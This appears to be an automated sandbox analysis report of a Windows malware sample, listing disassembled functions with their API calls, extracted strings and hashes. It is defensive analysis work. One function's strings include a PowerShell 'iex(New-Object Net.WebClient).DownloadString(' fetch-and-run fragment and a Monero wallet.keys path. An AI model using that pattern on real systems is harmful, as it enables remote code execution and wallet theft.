                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 8e198719086b23b3bb5bef241a08a15292a41ff4d7656dcff74ab9e0067152c9
                                        • Instruction ID: f0fc12f63c5ac0397c0b990259133d81c20c3cca21f189a32d5acbffdb1fcafb
                                        • Opcode Fuzzy Hash: 8e198719086b23b3bb5bef241a08a15292a41ff4d7656dcff74ab9e0067152c9
                                        • Instruction Fuzzy Hash: 7E01F4B9A44309FFDB10DBE4DC49FAEB778FB45700F104594F615A7291D7B05A008BA1
                                        Function 00984300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00984325
                                        • RegOpenKeyExA.ADVAPI32(80000001,0181E0C8,00000000,00020119,?), ref: 00984344
                                        • RegQueryValueExA.ADVAPI32(?,0181F6E0,00000000,00000000,00000000,000000FF), ref: 00984368
                                        • RegCloseKey.ADVAPI32(?), ref: 00984372
                                        • lstrcat.KERNEL32(?,00000000), ref: 00984397
                                        • lstrcat.KERNEL32(?,0181F740), ref: 009843AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                        • String ID:
                                        • API String ID: 2623679115-0
                                        • Opcode ID: 7843ef49e7c91c3117d96576a3f6e856a67ee6c7dff356e637c2bf08b4c168c1
                                        • Instruction ID: 79548413afd54521b7a52bc298d0b3c26203f7cf38afc5b29a436c4dcd31cb44
                                        • Opcode Fuzzy Hash: 7843ef49e7c91c3117d96576a3f6e856a67ee6c7dff356e637c2bf08b4c168c1
                                        • Instruction Fuzzy Hash: 794158B7900108ABDB18FBA0EC56FEE773DBBC9700F008558B71957185EA7556888BD2
                                        Function 0097A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                        • LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 29de1d86c867c03a4b4dfc482809d15fcae15700251b3f46f72533772b89f5b2
                                        • Instruction ID: b5e0fb68cb0541fce3934710fd23a3acb366e1ff95fa867a7ba75a0634bbd491
                                        • Opcode Fuzzy Hash: 29de1d86c867c03a4b4dfc482809d15fcae15700251b3f46f72533772b89f5b2
                                        • Instruction Fuzzy Hash: 72313274A04209EFDB14CF94C885BDE77B9FF88701F508158E915A7390D774AA41CFA1
                                        Function 0098CB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Typememset
                                        • String ID:
                                        • API String ID: 3530896902-3916222277
                                        • Opcode ID: e77fc5ee84795935c6efd50e401a2245a763212c8f17c89663b4410fafca662e
                                        • Instruction ID: 99aa5c46c495c255d2d442c49cf268214951aaf0417ce631e7809fa8a785e6eb
                                        • Opcode Fuzzy Hash: e77fc5ee84795935c6efd50e401a2245a763212c8f17c89663b4410fafca662e
                                        • Instruction Fuzzy Hash: 2541E6F110479C5EDB31AB24CC85FFB7BEC9B45704F1448E8E9CA96282E2719A44DF60
                                        Function 009849D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,0181F620), ref: 00984A2B
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00984A51
                                        • lstrcat.KERNEL32(?,?), ref: 00984A70
                                        • lstrcat.KERNEL32(?,?), ref: 00984A84
                                        • lstrcat.KERNEL32(?,0180A798), ref: 00984A97
                                        • lstrcat.KERNEL32(?,?), ref: 00984AAB
                                        • lstrcat.KERNEL32(?,0181E2A8), ref: 00984ABF
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00988F20: GetFileAttributesA.KERNEL32(00000000,?,00971B94,?,?,0099577C,?,?,00990E22), ref: 00988F2F
                                          • Part of subcall function 009847C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009847D0
                                          • Part of subcall function 009847C0: RtlAllocateHeap.NTDLL(00000000), ref: 009847D7
                                          • Part of subcall function 009847C0: wsprintfA.USER32 ref: 009847F6
                                          • Part of subcall function 009847C0: FindFirstFileA.KERNEL32(?,?), ref: 0098480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 0354c574923731cc7109cce25586acd0a198527600a17abc46c986fb792aaa3f
                                        • Instruction ID: 9d456b2a8091438133543852fc52800a7779a664c4d5f90c89ce47a8c61ade90
                                        • Opcode Fuzzy Hash: 0354c574923731cc7109cce25586acd0a198527600a17abc46c986fb792aaa3f
                                        • Instruction Fuzzy Hash: FB3142B6900218A7DB24FBB0DC95FDE733CBB98700F404689B24596151EFB4A7C8CBA5
                                        Function 00982EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00982FD5
                                        Strings
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00982F54
                                        • ')", xrefs: 00982F03
                                        • <, xrefs: 00982F89
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00982F14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: 14aaea04fc4c81cabbe9713ddfba0c2a020482e896f1778d8f4a01d4fc3f78ea
                                        • Instruction ID: 9918a0f71e3f4657d212ae1197a427f27ecb425458cf7dd3960677de2c998933
                                        • Opcode Fuzzy Hash: 14aaea04fc4c81cabbe9713ddfba0c2a020482e896f1778d8f4a01d4fc3f78ea
                                        • Instruction Fuzzy Hash: 2E41DE719102089AEB14FFE0CCA2BEDB779BF94300F40455AE015B7292EF786A49CF51
                                        Function 009ECBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: d2b550518adc6c62ebfbe3efe69004f29178dcd75341472c4e6b867ecb625b01
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 92217FB2D00698AFDB239E56CC41BBF3B79EB81794B254919FCD967211C3344D438BA0
                                        Function 00987F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,0180B8E8,00000000,00020119,?), ref: 00987FEE
                                        • RegQueryValueExA.ADVAPI32(?,0181DFE8,00000000,00000000,000000FF,000000FF), ref: 0098800F
                                        • RegCloseKey.ADVAPI32(?), ref: 00988022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: e60f7bfc1acbb52d2ba846f8495ac6ce28859956fac29e9a02baa5203aa911d7
                                        • Instruction ID: 3f1bb4c7ae1096f7efcadb0c2d297a47c4b78dd8e85fbbc0e32704a912f9e3a1
                                        • Opcode Fuzzy Hash: e60f7bfc1acbb52d2ba846f8495ac6ce28859956fac29e9a02baa5203aa911d7
                                        • Instruction Fuzzy Hash: C5118CB6A44205EFDB10DF94DD49FBFBBB8FB45B10F104219F615A7280D7B959008BA1
                                        Function 009893F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(0181F770,00000000,00000000,?,00979F71,00000000,0181F770,00000000), ref: 009893FC
                                        • lstrcpyn.KERNEL32(00C47580,0181F770,0181F770,?,00979F71,00000000,0181F770), ref: 00989420
                                        • lstrlen.KERNEL32(00000000,?,00979F71,00000000,0181F770), ref: 00989437
                                        • wsprintfA.USER32 ref: 00989457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: 92ff0a04cf14f29ca7e7f156d6cd1c28cbf946ef4f1802e4022aaaedce0a326d
                                        • Instruction ID: 31b12b09eb18e4cfd04f130837d96e40f3e23343c34b344c69441092782fdc76
                                        • Opcode Fuzzy Hash: 92ff0a04cf14f29ca7e7f156d6cd1c28cbf946ef4f1802e4022aaaedce0a326d
                                        • Instruction Fuzzy Hash: C001C875608108FFCB04DFA8C948AAE7B78FB49304F158648F9099B255D731AA54DBA0
                                        Function 009712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009712B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009712BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009712D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009712F5
                                        • RegCloseKey.ADVAPI32(?), ref: 009712FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
